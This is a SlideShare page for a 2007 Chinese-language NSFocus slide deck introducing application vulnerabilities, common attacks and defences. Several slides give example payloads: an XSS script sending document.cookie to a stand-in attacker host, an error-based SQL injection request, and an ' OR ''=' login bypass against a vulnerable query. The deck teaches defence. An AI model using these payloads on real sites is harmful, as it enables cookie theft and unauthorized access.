SlideShare uma empresa Scribd logo

2007 - 应用系统脆弱性概论

Na Lee
Na Lee

2007 年的一份文档

Internet
1 de 22
Baixar para ler offline
应用系统脆弱性概论 绿盟科技 sbilly2007年9月 NSFocus Information Technology Co. Ltd. 密级:公开文档
2 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 目录页 •应用系统脆弱性 •应用系统面临的攻击 •如何保护应用系统
应用系统脆弱性 风险=F(资产, 脆弱性, 威胁)
4 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 应用系统脆弱性 •什么是脆弱性 –脆弱性是风险的构成部分 •Risk = F (Asset,Threat,Vulnerability) –脆弱性是一个或一组资产中存在的,可能被一个或多个威 胁利用的脆弱之处 •被利用来攻击业务系统的漏洞 •应用系统脆弱性的构成 –应用系统的构成 •人、业务流程、软件、硬件 –应用系统脆弱性的构成 •人、业务流程、软件、硬件
5 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 应用系统技术模型 •网络 –通信协议 –网络设备 •操作系统 –Windows –Linux •一般服务组件 –Web 服务 –数据库服务 •用户特定应用 –网银 –门户
6 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 客户端同样会遭到攻击!
应用系统所面临的攻击
8 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 应用系统的脆弱性 •通信协议的脆弱性(通用) •网络设备的脆弱性(通用) •操作系统的脆弱性(通用) •一般服务组件的脆弱性(通用) •应用脆弱性(不通用)
9 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 应用系统面临的攻击 •利用通用脆弱性(Common Vulnerability)的攻击 –利用通信协议脆弱性的攻击: •ARP Spoof •DNS Poison •大部分拒绝服务攻击 –利用网络设备、操作系统、一般组件漏洞的攻击: •弱密码 •缺乏补丁 •配置失误
10 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 应用系统面临的攻击 •利用特殊脆弱性(Custom Vulnerability)的攻击
11 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 针对特定应用最常见的攻击 •背景资料 –时间:2006年1月1日至2006年12月31日 –测试应用数量:31373个 •最常见攻击 –跨站脚本 –信息泄漏 –SQL 注入
12 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 跨站脚本-Cross-site Scripting •什么是跨站脚本 –Cross-site Scripting 或者XSS –跨站脚本是一种迫使应用系统向客户端回显攻击者所提交 可执行代码的攻击技巧,通常是针对浏览器的攻击,攻击 者提交的代码通常是HTML/JavaScript,但是也可以扩 展到VBScript/ActiveX/Java 等其他浏览器支持的技术上 •跨站脚本产生原因 –没有对用户数据进行校验和过滤 •跨站脚本的危害 –伪造信息,欺骗用户 –盗窃用户Cookie 中的敏感信息
13 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 •案例 –某个站点页面 http://portal.example/index.php?sessionid=12312312&username=Joe 显示信息为Hello, Joe! –攻击者诱使用户点击链接 http://portal.example/index.php?sessionid=12312312& username=<script>document.location=‘http://attacker host.example/cgi- bin/cookiesteal.cgi?’+document.cookie</script> 就可以成 功窃取用户的Cookie 跨站脚本
14 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 信息泄漏-Information Leakage •什么是信息泄漏 –Information Leakage –信息泄漏是攻击者通过某种方式获得应用系统某些敏感信 息的攻击技巧,通常是利用程序员遗留在代码中的注释或 者服务器程序的错误信息 •跨站脚本产生原因 –应用系统部署时没有将注释去掉 –应用系统部署时没有正确的配置服务器程序 •跨站脚本的危害 –有利于攻击者进一步的攻击,例如SQL 注入
15 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 •案例 –某站点存在SQL 注入漏洞,攻击者提交请求 http://portal.example/index.asp? id=10 ;select TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES— 将通过错误信息获得数据表的第一个表名 Microsoft OLE DB Provider for ODBC Drivers error '80040e07’ [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int. /index.asp, line 5 跨站脚本
16 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 SQL 注入-SQL Injection •什么是SQL 注入 –SQL 注入 –SQL 注入是攻击者通过输入恶意的请求直接操作数据库服 务器的攻击技巧 •跨站脚本产生原因 –应用开发过程中没有对用户输入进行校验和过滤 •跨站脚本的危害 –机密数据泄漏 –服务器被控制
17 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 •案例 –某站点存在以下代码 SQLQuery = "SELECT Username FROM Users WHERE Username = '" & strUsername & "' AND Password = '" & strPassword & "'“ strAuthCheck = GetQueryResult(SQLQuery) 攻击者提交的请求使得: strUsername=' OR ''=' strPassword=' OR ''=' 此时查询变成 SELECT Username FROM Users WHERE Username = '' OR ''='' AND Password = '' OR ''='' 攻击者直接绕过系统的身份验证 跨站脚本
如何保护应用系统
19 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 应用系统的脆弱性 •通信协议的脆弱性(通用) •网络设备的脆弱性(通用) •操作系统的脆弱性(通用) •一般服务组件的脆弱性(通用) •应用脆弱性(不通用)
20 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 如何保护应用系统 •降低系统脆弱性 –通用脆弱性(Common Vulnerability) •补丁管理 •安全加固 •安全设备(Firewall、IPS、Anti-DoS) –特殊脆弱性(Custom Vulnerability) •安全编码 •应用安全测试 •Application Firewall •SQL Driver Proxy
绿盟科技–巨人背后的专家 谢谢!
22 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 Questions?

Recomendados

PIC_Experience2
PIC_Experience2PIC_Experience2
PIC_Experience2ray chen
 
Hiiir 資安講座 II 使安全成為軟體開發的一部分
Hiiir 資安講座 II 使安全成為軟體開發的一部分Hiiir 資安講座 II 使安全成為軟體開發的一部分
Hiiir 資安講座 II 使安全成為軟體開發的一部分Hiiir Lab
 
使安全成為軟體開發必要部分
使安全成為軟體開發必要部分使安全成為軟體開發必要部分
使安全成為軟體開發必要部分Taien Wang
 
作業系統14組
作業系統14組作業系統14組
作業系統14組继洵 蔡
 
.NET Security Application/Web Development - Part IV
.NET Security Application/Web Development - Part IV.NET Security Application/Web Development - Part IV
.NET Security Application/Web Development - Part IVChen-Tien Tsai
 
基礎網頁程式攻擊檢驗
基礎網頁程式攻擊檢驗基礎網頁程式攻擊檢驗
基礎網頁程式攻擊檢驗Taien Wang
 
持续集成入门
持续集成入门持续集成入门
持续集成入门Lieping Xie
 
EuroDjangoCon 2009 - Ein Rückblick
EuroDjangoCon 2009 - Ein RückblickEuroDjangoCon 2009 - Ein Rückblick
EuroDjangoCon 2009 - Ein RückblickMarkus Zapke-Gründemann
 

Recomendados

PIC_Experience2
PIC_Experience2PIC_Experience2
PIC_Experience2ray chen
 
Hiiir 資安講座 II 使安全成為軟體開發的一部分
Hiiir 資安講座 II 使安全成為軟體開發的一部分Hiiir 資安講座 II 使安全成為軟體開發的一部分
Hiiir 資安講座 II 使安全成為軟體開發的一部分Hiiir Lab
 
使安全成為軟體開發必要部分
使安全成為軟體開發必要部分使安全成為軟體開發必要部分
使安全成為軟體開發必要部分Taien Wang
 
作業系統14組
作業系統14組作業系統14組
作業系統14組继洵 蔡
 
.NET Security Application/Web Development - Part IV
.NET Security Application/Web Development - Part IV.NET Security Application/Web Development - Part IV
.NET Security Application/Web Development - Part IVChen-Tien Tsai
 
基礎網頁程式攻擊檢驗
基礎網頁程式攻擊檢驗基礎網頁程式攻擊檢驗
基礎網頁程式攻擊檢驗Taien Wang
 
持续集成入门
持续集成入门持续集成入门
持续集成入门Lieping Xie
 
EuroDjangoCon 2009 - Ein Rückblick
EuroDjangoCon 2009 - Ein RückblickEuroDjangoCon 2009 - Ein Rückblick
EuroDjangoCon 2009 - Ein RückblickMarkus Zapke-Gründemann
 
Django-Queryset
Django-QuerysetDjango-Queryset
Django-QuerysetMindfire Solutions
 
Super Advanced Python –act1
Super Advanced Python –act1Super Advanced Python –act1
Super Advanced Python –act1Ke Wei Louis
 
Bottle - Python Web Microframework
Bottle - Python Web MicroframeworkBottle - Python Web Microframework
Bottle - Python Web MicroframeworkMarkus Zapke-Gründemann
 
Load testing
Load testingLoad testing
Load testingMindfire Solutions
 
Authentication & Authorization in ASPdotNet MVC
Authentication & Authorization in ASPdotNet MVCAuthentication & Authorization in ASPdotNet MVC
Authentication & Authorization in ASPdotNet MVCMindfire Solutions
 
User-centered open source
User-centered open sourceUser-centered open source
User-centered open sourceJacqueline Kazil
 
라이트닝 토크 2015 파이콘
라이트닝 토크 2015 파이콘라이트닝 토크 2015 파이콘
라이트닝 토크 2015 파이콘Jiho Lee
 
Html5 History-API
Html5 History-APIHtml5 History-API
Html5 History-APIMindfire Solutions
 
The Django Book, Chapter 16: django.contrib
The Django Book, Chapter 16: django.contribThe Django Book, Chapter 16: django.contrib
The Django Book, Chapter 16: django.contribTzu-ping Chung
 
PyClab.__init__(self)
PyClab.__init__(self)PyClab.__init__(self)
PyClab.__init__(self)Tzu-ping Chung
 
Digesting jQuery
Digesting jQueryDigesting jQuery
Digesting jQueryMindfire Solutions
 
Django e il Rap Elia Contini
Django e il Rap Elia ContiniDjango e il Rap Elia Contini
Django e il Rap Elia ContiniWEBdeBS
 
Django - The Web framework for perfectionists with deadlines
Django - The Web framework for perfectionists with deadlinesDjango - The Web framework for perfectionists with deadlines
Django - The Web framework for perfectionists with deadlinesMarkus Zapke-Gründemann
 
2016 py con2016_lightingtalk_php to python
2016 py con2016_lightingtalk_php to python2016 py con2016_lightingtalk_php to python
2016 py con2016_lightingtalk_php to pythonJiho Lee
 
NoSql Day - Apertura
NoSql Day - AperturaNoSql Day - Apertura
NoSql Day - AperturaWEBdeBS
 
Rabbitmq & Postgresql
Rabbitmq & PostgresqlRabbitmq & Postgresql
Rabbitmq & PostgresqlLucio Grenzi
 
Django mongodb -djangoday_
Django mongodb -djangoday_Django mongodb -djangoday_
Django mongodb -djangoday_WEBdeBS
 
The Django Book Chapter 9 - Django Workshop - Taipei.py
The Django Book Chapter 9 - Django Workshop - Taipei.pyThe Django Book Chapter 9 - Django Workshop - Taipei.py
The Django Book Chapter 9 - Django Workshop - Taipei.pyTzu-ping Chung
 
2 × 3 = 6
2 × 3 = 62 × 3 = 6
2 × 3 = 6Tzu-ping Chung
 
Overview of Testing Talks at Pycon
Overview of Testing Talks at PyconOverview of Testing Talks at Pycon
Overview of Testing Talks at PyconJacqueline Kazil
 
議題二:Web應用程式安全防護
議題二:Web應用程式安全防護議題二:Web應用程式安全防護
議題二:Web應用程式安全防護Nicolas su
 
議題三:政府網站常見弱點與分析
議題三:政府網站常見弱點與分析議題三:政府網站常見弱點與分析
議題三:政府網站常見弱點與分析Nicolas su
 

Mais conteúdo relacionado

Destaque

Super Advanced Python –act1
Super Advanced Python –act1Super Advanced Python –act1
Super Advanced Python –act1Ke Wei Louis
 
Authentication & Authorization in ASPdotNet MVC
Authentication & Authorization in ASPdotNet MVCAuthentication & Authorization in ASPdotNet MVC
Authentication & Authorization in ASPdotNet MVCMindfire Solutions
 
라이트닝 토크 2015 파이콘
라이트닝 토크 2015 파이콘라이트닝 토크 2015 파이콘
라이트닝 토크 2015 파이콘Jiho Lee
 
The Django Book, Chapter 16: django.contrib
The Django Book, Chapter 16: django.contribThe Django Book, Chapter 16: django.contrib
The Django Book, Chapter 16: django.contribTzu-ping Chung
 
Django e il Rap Elia Contini
Django e il Rap Elia ContiniDjango e il Rap Elia Contini
Django e il Rap Elia ContiniWEBdeBS
 
Django - The Web framework for perfectionists with deadlines
Django - The Web framework for perfectionists with deadlinesDjango - The Web framework for perfectionists with deadlines
Django - The Web framework for perfectionists with deadlinesMarkus Zapke-Gründemann
 
2016 py con2016_lightingtalk_php to python
2016 py con2016_lightingtalk_php to python2016 py con2016_lightingtalk_php to python
2016 py con2016_lightingtalk_php to pythonJiho Lee
 
NoSql Day - Apertura
NoSql Day - AperturaNoSql Day - Apertura
NoSql Day - AperturaWEBdeBS
 
Rabbitmq & Postgresql
Rabbitmq & PostgresqlRabbitmq & Postgresql
Rabbitmq & PostgresqlLucio Grenzi
 
Django mongodb -djangoday_
Django mongodb -djangoday_Django mongodb -djangoday_
Django mongodb -djangoday_WEBdeBS
 
The Django Book Chapter 9 - Django Workshop - Taipei.py
The Django Book Chapter 9 - Django Workshop - Taipei.pyThe Django Book Chapter 9 - Django Workshop - Taipei.py
The Django Book Chapter 9 - Django Workshop - Taipei.pyTzu-ping Chung
 
Overview of Testing Talks at Pycon
Overview of Testing Talks at PyconOverview of Testing Talks at Pycon
Overview of Testing Talks at PyconJacqueline Kazil
 

Destaque (20)

Django-Queryset
Django-QuerysetDjango-Queryset
Django-Queryset
 
Super Advanced Python –act1
Super Advanced Python –act1Super Advanced Python –act1
Super Advanced Python –act1
 
Bottle - Python Web Microframework
Bottle - Python Web MicroframeworkBottle - Python Web Microframework
Bottle - Python Web Microframework
 
Load testing
Load testingLoad testing
Load testing
 
Authentication & Authorization in ASPdotNet MVC
Authentication & Authorization in ASPdotNet MVCAuthentication & Authorization in ASPdotNet MVC
Authentication & Authorization in ASPdotNet MVC
 
User-centered open source
User-centered open sourceUser-centered open source
User-centered open source
 
라이트닝 토크 2015 파이콘
라이트닝 토크 2015 파이콘라이트닝 토크 2015 파이콘
라이트닝 토크 2015 파이콘
 
Html5 History-API
Html5 History-APIHtml5 History-API
Html5 History-API
 
The Django Book, Chapter 16: django.contrib
The Django Book, Chapter 16: django.contribThe Django Book, Chapter 16: django.contrib
The Django Book, Chapter 16: django.contrib
 
PyClab.__init__(self)
PyClab.__init__(self)PyClab.__init__(self)
PyClab.__init__(self)
 
Digesting jQuery
Digesting jQueryDigesting jQuery
Digesting jQuery
 
Django e il Rap Elia Contini
Django e il Rap Elia ContiniDjango e il Rap Elia Contini
Django e il Rap Elia Contini
 
Django - The Web framework for perfectionists with deadlines
Django - The Web framework for perfectionists with deadlinesDjango - The Web framework for perfectionists with deadlines
Django - The Web framework for perfectionists with deadlines
 
2016 py con2016_lightingtalk_php to python
2016 py con2016_lightingtalk_php to python2016 py con2016_lightingtalk_php to python
2016 py con2016_lightingtalk_php to python
 
NoSql Day - Apertura
NoSql Day - AperturaNoSql Day - Apertura
NoSql Day - Apertura
 
Rabbitmq & Postgresql
Rabbitmq & PostgresqlRabbitmq & Postgresql
Rabbitmq & Postgresql
 
Django mongodb -djangoday_
Django mongodb -djangoday_Django mongodb -djangoday_
Django mongodb -djangoday_
 
The Django Book Chapter 9 - Django Workshop - Taipei.py
The Django Book Chapter 9 - Django Workshop - Taipei.pyThe Django Book Chapter 9 - Django Workshop - Taipei.py
The Django Book Chapter 9 - Django Workshop - Taipei.py
 
2 × 3 = 6
2 × 3 = 62 × 3 = 6
2 × 3 = 6
 
Overview of Testing Talks at Pycon
Overview of Testing Talks at PyconOverview of Testing Talks at Pycon
Overview of Testing Talks at Pycon
 

Semelhante a 2007 - 应用系统脆弱性概论

議題二:Web應用程式安全防護
議題二:Web應用程式安全防護議題二:Web應用程式安全防護
議題二:Web應用程式安全防護Nicolas su
 
議題三:政府網站常見弱點與分析
議題三:政府網站常見弱點與分析議題三:政府網站常見弱點與分析
議題三:政府網站常見弱點與分析Nicolas su
 
渗透测试思路技术与方法
渗透测试思路技术与方法渗透测试思路技术与方法
渗透测试思路技术与方法
 
互联网公司web安全挑战与防护思路浅谈
互联网公司web安全挑战与防护思路浅谈 互联网公司web安全挑战与防护思路浅谈
互联网公司web安全挑战与防护思路浅谈 zhiyanhui
 
OWASP Top 10 (2013) 正體中文版
OWASP Top 10 (2013) 正體中文版OWASP Top 10 (2013) 正體中文版
OWASP Top 10 (2013) 正體中文版Bruce Chen
 
分会场四服务器安全防护的意义与价值
分会场四服务器安全防护的意义与价值分会场四服务器安全防护的意义与价值
分会场四服务器安全防护的意义与价值ITband
 
Solution apc 4.0
Solution apc 4.0Solution apc 4.0
Solution apc 4.0ahnlabchina
 
开源应用日志收集系统
开源应用日志收集系统开源应用日志收集系统
开源应用日志收集系统reinhardx
 
Internet System Security Overview
Internet System Security OverviewInternet System Security Overview
Internet System Security OverviewChinaNetCloud
 
Rsa2012 下一代安全的战略思考-绿盟科技赵粮
Rsa2012 下一代安全的战略思考-绿盟科技赵粮Rsa2012 下一代安全的战略思考-绿盟科技赵粮
Rsa2012 下一代安全的战略思考-绿盟科技赵粮NSFOCUS
 
军工行业网络安全解决方案整体设计
军工行业网络安全解决方案整体设计军工行业网络安全解决方案整体设计
军工行业网络安全解决方案整体设计gb ku
 
分会场六利用赛门铁克的Sort工具降低风险,提高应用的持续运行时间 中文版
分会场六利用赛门铁克的Sort工具降低风险,提高应用的持续运行时间 中文版分会场六利用赛门铁克的Sort工具降低风险,提高应用的持续运行时间 中文版
分会场六利用赛门铁克的Sort工具降低风险,提高应用的持续运行时间 中文版ITband
 
Java day 2014_20140723_v2
Java day 2014_20140723_v2Java day 2014_20140723_v2
Java day 2014_20140723_v2peihsin1980
 
中大型规模的网站架构运维 Saac
中大型规模的网站架构运维 Saac中大型规模的网站架构运维 Saac
中大型规模的网站架构运维 SaacChao Zhu
 
Chinese Uses of Big Data Cloud Security 漫步在雲端資安新戰場
Chinese Uses of Big Data Cloud Security 漫步在雲端資安新戰場 Chinese Uses of Big Data Cloud Security 漫步在雲端資安新戰場
Chinese Uses of Big Data Cloud Security 漫步在雲端資安新戰場 Bill Hagestad II
 
WebConf 2013「Best Practices - The Upload」
WebConf 2013「Best Practices - The Upload」WebConf 2013「Best Practices - The Upload」
WebConf 2013「Best Practices - The Upload」Orange Tsai
 
阿里巴巴运维自动化的探索与规划
阿里巴巴运维自动化的探索与规划阿里巴巴运维自动化的探索与规划
阿里巴巴运维自动化的探索与规划mysqlops
 

Semelhante a 2007 - 应用系统脆弱性概论 (20)

議題二:Web應用程式安全防護
議題二:Web應用程式安全防護議題二:Web應用程式安全防護
議題二:Web應用程式安全防護
 
議題三:政府網站常見弱點與分析
議題三:政府網站常見弱點與分析議題三:政府網站常見弱點與分析
議題三:政府網站常見弱點與分析
 
渗透测试思路技术与方法
渗透测试思路技术与方法渗透测试思路技术与方法
渗透测试思路技术与方法
 
互联网公司web安全挑战与防护思路浅谈
互联网公司web安全挑战与防护思路浅谈 互联网公司web安全挑战与防护思路浅谈
互联网公司web安全挑战与防护思路浅谈
 
OWASP Top 10 (2013) 正體中文版
OWASP Top 10 (2013) 正體中文版OWASP Top 10 (2013) 正體中文版
OWASP Top 10 (2013) 正體中文版
 
分会场四服务器安全防护的意义与价值
分会场四服务器安全防护的意义与价值分会场四服务器安全防护的意义与价值
分会场四服务器安全防护的意义与价值
 
Solution apc 4.0
Solution apc 4.0Solution apc 4.0
Solution apc 4.0
 
开源应用日志收集系统
开源应用日志收集系统开源应用日志收集系统
开源应用日志收集系统
 
Internet System Security Overview
Internet System Security OverviewInternet System Security Overview
Internet System Security Overview
 
Rsa2012 下一代安全的战略思考-绿盟科技赵粮
Rsa2012 下一代安全的战略思考-绿盟科技赵粮Rsa2012 下一代安全的战略思考-绿盟科技赵粮
Rsa2012 下一代安全的战略思考-绿盟科技赵粮
 
军工行业网络安全解决方案整体设计
军工行业网络安全解决方案整体设计军工行业网络安全解决方案整体设计
军工行业网络安全解决方案整体设计
 
分会场六利用赛门铁克的Sort工具降低风险,提高应用的持续运行时间 中文版
分会场六利用赛门铁克的Sort工具降低风险,提高应用的持续运行时间 中文版分会场六利用赛门铁克的Sort工具降低风险,提高应用的持续运行时间 中文版
分会场六利用赛门铁克的Sort工具降低风险,提高应用的持续运行时间 中文版
 
Java day 2014_20140723_v2
Java day 2014_20140723_v2Java day 2014_20140723_v2
Java day 2014_20140723_v2
 
中大型规模的网站架构运维 Saac
中大型规模的网站架构运维 Saac中大型规模的网站架构运维 Saac
中大型规模的网站架构运维 Saac
 
SWsoft_Prim@Telecom
SWsoft_Prim@TelecomSWsoft_Prim@Telecom
SWsoft_Prim@Telecom
 
Chinese Uses of Big Data Cloud Security 漫步在雲端資安新戰場
Chinese Uses of Big Data Cloud Security 漫步在雲端資安新戰場 Chinese Uses of Big Data Cloud Security 漫步在雲端資安新戰場
Chinese Uses of Big Data Cloud Security 漫步在雲端資安新戰場
 
軟體安全防護大作戰
軟體安全防護大作戰軟體安全防護大作戰
軟體安全防護大作戰
 
CDP方案介绍
CDP方案介绍CDP方案介绍
CDP方案介绍
 
WebConf 2013「Best Practices - The Upload」
WebConf 2013「Best Practices - The Upload」WebConf 2013「Best Practices - The Upload」
WebConf 2013「Best Practices - The Upload」
 
阿里巴巴运维自动化的探索与规划
阿里巴巴运维自动化的探索与规划阿里巴巴运维自动化的探索与规划
阿里巴巴运维自动化的探索与规划
 

Mais de Na Lee

Aruba-MESH-解决方案.pdf
Aruba-MESH-解决方案.pdfAruba-MESH-解决方案.pdf
Aruba-MESH-解决方案.pdfNa Lee
 
火山引擎-飞连产品介绍.pdf
火山引擎-飞连产品介绍.pdf火山引擎-飞连产品介绍.pdf
火山引擎-飞连产品介绍.pdfNa Lee
 
2007 年互联网基础设施安全的想法
2007 年互联网基础设施安全的想法2007 年互联网基础设施安全的想法
2007 年互联网基础设施安全的想法Na Lee
 
02.python.开发最佳实践
02.python.开发最佳实践02.python.开发最佳实践
02.python.开发最佳实践Na Lee
 
01.python.开发最佳实践
01.python.开发最佳实践01.python.开发最佳实践
01.python.开发最佳实践Na Lee
 
手机网络游戏平台
手机网络游戏平台手机网络游戏平台
手机网络游戏平台Na Lee
 
淘宝连锁店
淘宝连锁店淘宝连锁店
淘宝连锁店Na Lee
 

Mais de Na Lee (7)

Aruba-MESH-解决方案.pdf
Aruba-MESH-解决方案.pdfAruba-MESH-解决方案.pdf
Aruba-MESH-解决方案.pdf
 
火山引擎-飞连产品介绍.pdf
火山引擎-飞连产品介绍.pdf火山引擎-飞连产品介绍.pdf
火山引擎-飞连产品介绍.pdf
 
2007 年互联网基础设施安全的想法
2007 年互联网基础设施安全的想法2007 年互联网基础设施安全的想法
2007 年互联网基础设施安全的想法
 
02.python.开发最佳实践
02.python.开发最佳实践02.python.开发最佳实践
02.python.开发最佳实践
 
01.python.开发最佳实践
01.python.开发最佳实践01.python.开发最佳实践
01.python.开发最佳实践
 
手机网络游戏平台
手机网络游戏平台手机网络游戏平台
手机网络游戏平台
 
淘宝连锁店
淘宝连锁店淘宝连锁店
淘宝连锁店
 

2007 - 应用系统脆弱性概论

  • 1. 应用系统脆弱性概论 绿盟科技 sbilly2007年9月 NSFocus Information Technology Co. Ltd. 密级:公开文档
  • 2. 2 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 目录页 •应用系统脆弱性 •应用系统面临的攻击 •如何保护应用系统
  • 4. 4 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 应用系统脆弱性 •什么是脆弱性 –脆弱性是风险的构成部分 •Risk = F (Asset,Threat,Vulnerability) –脆弱性是一个或一组资产中存在的,可能被一个或多个威 胁利用的脆弱之处 •被利用来攻击业务系统的漏洞 •应用系统脆弱性的构成 –应用系统的构成 •人、业务流程、软件、硬件 –应用系统脆弱性的构成 •人、业务流程、软件、硬件
  • 5. 5 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 应用系统技术模型 •网络 –通信协议 –网络设备 •操作系统 –Windows –Linux •一般服务组件 –Web 服务 –数据库服务 •用户特定应用 –网银 –门户
  • 6. 6 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 客户端同样会遭到攻击!
  • 8. 8 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 应用系统的脆弱性 •通信协议的脆弱性(通用) •网络设备的脆弱性(通用) •操作系统的脆弱性(通用) •一般服务组件的脆弱性(通用) •应用脆弱性(不通用)
  • 9. 9 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 应用系统面临的攻击 •利用通用脆弱性(Common Vulnerability)的攻击 –利用通信协议脆弱性的攻击: •ARP Spoof •DNS Poison •大部分拒绝服务攻击 –利用网络设备、操作系统、一般组件漏洞的攻击: •弱密码 •缺乏补丁 •配置失误
  • 10. 10 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 应用系统面临的攻击 •利用特殊脆弱性(Custom Vulnerability)的攻击
  • 11. 11 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 针对特定应用最常见的攻击 •背景资料 –时间:2006年1月1日至2006年12月31日 –测试应用数量:31373个 •最常见攻击 –跨站脚本 –信息泄漏 –SQL 注入
  • 12. 12 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 跨站脚本-Cross-site Scripting •什么是跨站脚本 –Cross-site Scripting 或者XSS –跨站脚本是一种迫使应用系统向客户端回显攻击者所提交 可执行代码的攻击技巧,通常是针对浏览器的攻击,攻击 者提交的代码通常是HTML/JavaScript,但是也可以扩 展到VBScript/ActiveX/Java 等其他浏览器支持的技术上 •跨站脚本产生原因 –没有对用户数据进行校验和过滤 •跨站脚本的危害 –伪造信息,欺骗用户 –盗窃用户Cookie 中的敏感信息
  • 13. 13 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 •案例 –某个站点页面 http://portal.example/index.php?sessionid=12312312&username=Joe 显示信息为Hello, Joe! –攻击者诱使用户点击链接 http://portal.example/index.php?sessionid=12312312& username=<script>document.location=‘http://attacker host.example/cgi- bin/cookiesteal.cgi?’+document.cookie</script> 就可以成 功窃取用户的Cookie 跨站脚本
  • 14. 14 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 信息泄漏-Information Leakage •什么是信息泄漏 –Information Leakage –信息泄漏是攻击者通过某种方式获得应用系统某些敏感信 息的攻击技巧,通常是利用程序员遗留在代码中的注释或 者服务器程序的错误信息 •跨站脚本产生原因 –应用系统部署时没有将注释去掉 –应用系统部署时没有正确的配置服务器程序 •跨站脚本的危害 –有利于攻击者进一步的攻击,例如SQL 注入
  • 15. 15 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 •案例 –某站点存在SQL 注入漏洞,攻击者提交请求 http://portal.example/index.asp? id=10 ;select TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES— 将通过错误信息获得数据表的第一个表名 Microsoft OLE DB Provider for ODBC Drivers error '80040e07’ [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int. /index.asp, line 5 跨站脚本
  • 16. 16 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 SQL 注入-SQL Injection •什么是SQL 注入 –SQL 注入 –SQL 注入是攻击者通过输入恶意的请求直接操作数据库服 务器的攻击技巧 •跨站脚本产生原因 –应用开发过程中没有对用户输入进行校验和过滤 •跨站脚本的危害 –机密数据泄漏 –服务器被控制
  • 17. 17 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 •案例 –某站点存在以下代码 SQLQuery = "SELECT Username FROM Users WHERE Username = '" & strUsername & "' AND Password = '" & strPassword & "'“ strAuthCheck = GetQueryResult(SQLQuery) 攻击者提交的请求使得: strUsername=' OR ''=' strPassword=' OR ''=' 此时查询变成 SELECT Username FROM Users WHERE Username = '' OR ''='' AND Password = '' OR ''='' 攻击者直接绕过系统的身份验证 跨站脚本
  • 19. 19 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 应用系统的脆弱性 •通信协议的脆弱性(通用) •网络设备的脆弱性(通用) •操作系统的脆弱性(通用) •一般服务组件的脆弱性(通用) •应用脆弱性(不通用)
  • 20. 20 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 如何保护应用系统 •降低系统脆弱性 –通用脆弱性(Common Vulnerability) •补丁管理 •安全加固 •安全设备(Firewall、IPS、Anti-DoS) –特殊脆弱性(Custom Vulnerability) •安全编码 •应用安全测试 •Application Firewall •SQL Driver Proxy
  • 22. 22 © 2007 中联绿盟信息技术(北京)有限公司 密级:内部使用 Questions?